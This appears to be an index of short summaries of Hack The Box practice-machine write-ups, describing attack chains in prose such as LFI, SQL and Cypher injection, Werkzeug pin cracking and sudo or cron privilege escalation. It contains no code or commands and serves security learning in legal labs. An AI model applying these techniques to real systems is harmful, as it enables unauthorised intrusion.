Pilgrimage is an easy machine which starts with identifying the ImageMagick tool that the target web application uses to shrink images. The tool is vulnerable to Arbitrary File Reads which enable us to fetch the credentials from a database file. These credentials were used to SSH and gain a user shell. The privilege escalation consists of exploiting Binwalk that runs inside a cron script.
Topology is an easy machine which starts by exploiting LaTeX injection to read files on the server that contain password hashes. After cracking the password hash, it was possible to login via SSH and obtain the user flag. The privilege escalation consisted of enumerating for processes that are run by root. One of the processes being run by root executed “.plt” files in a particular folder to which the user had write permissions. Finally, it was a simple matter of looking up the documentation on running OS commands for that particular extension and use it to gain a shell as root.
Machine Name: Jupiter IP: 10.10.11.216 Difficulty: Medium
Summary
Jupiter is a medium machine that starts with discovering a subdomain that retrieves data from the database using queries sent through the request, making it vulnerable to SQLi. The SQL injection is leveraged to gain a shell as user Postgres. A configuration script writable by Postgres, and run by Juno is used to gain a shell as Juno. Juno is a part of “science” group which uses Jupyter Notebook. The Jupyter service is run by Jovian. The logs of Jupyter can be read by Juno, which are used obtain tokens to login to the Jupyter Hub. The notebook is used to execute commands and gain a shell as Jovian. To escalate privileges as root, a binary which can be run using sudo, uses a configuration file which can be written by Jovian. This misconfiguration is leveraged to gain a shell as root.
Machine Name: Format IP: 10.10.11.213 Difficulty: Medium
Summary
Format is a medium machine that starts with discovering two ports that run Gitea and a Microblog respectively. First, an LFI is discovered on the Microblog after reviewing the source code. Further analysing the source code, one could bypass the mechanism to become Pro user and upload image files. One of the parameters that causes LFI creates a new if it doesn’t already exist. This allowed writing a PHP shell through which a shell was obtained as www-data. A redis server running on a socket was discovered and used to obtain credentials for the user “cooper”. Privilege escalation involved exploiting a python format string vulnerability for a script that could be run using sudo.
Machine Name: Snoopy IP: 10.10.11.212 Difficulty: Hard
Summary
Snoopy is a hard machine that starts with discovering subdomains through DNS zone transfer, and exploiting an LFI to obtain site configuration files that revealed mailserver secret key. The key was used to update the mail server’s DNS records to receive mails on my local SMTP server. The mattermost subdomain discovered had an “email password reset link” page. The password was received on the SMTP server for user cbrown. Authenticated session of mattermost provided an option to interact with the server through SSH which was intercepted to perform a man-in-the-middle attack to fetch the SSH credentials of cbrown. The user cbrown could run “git apply” command as user sbrown which was exploited by using a known vulnerability that uses symbolic links to access files of the user running Git. This was used to write the SSH public key into sbrown and gain a SSH shell. Privilege escalation involved exploiting ClamAV’s XXE vulnerability to fetch the private key of root.
Machine Name: OnlyForYou IP: 10.10.11.210 Difficulty: Medium
Summary
OnlyForYou is a medium machine that starts with discovering a subdomain that is vulnerable to LFI. The LFI is used to read the source code of the application. Improper sanitization of user data in the a part of code that executes shell commands was leveraged to gain a shell as www-data. From this shell, two active ports were found, one of which hosted a login page that used default credentials. The dashboard revealed that the application uses Neo4j database. This information was used to test for Cipher injection. The cipher injection was successful and was used to gain password hashes from the database. The cracked hashes were used to login as user John. Privilege escalation involved abusing the “pip3 download” command that could be run as root by the user.
Machine Name: Agile IP: 10.10.11.203 Difficulty: Medium
Summary
Agile is a medium machine that starts with discovering a LFI which was leveraged to gain information required to crack the Werkzeug pin. The werkzeug pin allowed console access which allowed us to gain a shell as www-data. A config file revealed MySQL database credentials. The credentials for user corum were found which were used to SSH into the box. Enumerating further, it was found that chrome was running a remote-debugging-port at 41829 which was port forwarded to attacker machine which allowed us access to an existing session of the application. The credentials for user edwards was found here and were used to SSH into the box. Privilege escalation to root involved exploiting the sudo version 1.9.9 which was used to execute a writeable script running as root.
Inject is an easy machine which starts with exploiting an LFI to gain information on the application being built on Spring Framework. Through the LFI, we discover one of the configuration files which reveals that the framework version is vulnerable to RCE. The RCE in Spring Cloud is exploited to gain a shell as user Frank. However, only user Phil can read the user flag. The credentials of Phil were found in another configuration file which was used to switch user to Phil. Privilege Escalation consisted of checking for cronjobs and looking for vulnerabilities in the jobs running as root. Ansible was being run on all the “.yml” files, which was exploited to gain access as root.
Trick is a moderately easy machine that demands a lot of enumeration skills. It involves finding two sub-domains that can be found through DNS zone transfer and sub-domain fuzzing. One of the sub-domains has a SQLi that can be leveraged to gather information on the server and the other sub-domain has a LFI that exposes SSH private key. This key is used to gain SSH access to the user. Since the user can restart fail2ban as root, one of fail2ban’s configuration files needed to be modified to gain a reverse shell as root.
OpenSource like it’s name is all about exploiting information that is openly available. It demands knowledge about LFI, Docker, Flask, understanding source code, and ofcourse, Git. To get the user shell, LFI vulnerability was exploited to get RCE. Then, a docker container needed to be escaped in order to gain the user shell. Knowledge of tunneling helps to connect to the host machine and enumerate further. Ability to access the host machine lets us enumerate further and gain access to user via leaked credentials. Escalating privileges requires understanding the concept of Git hooks to exploit a process running as root. This box is great for someone who is new to programming and learning code/version management tools like Git.
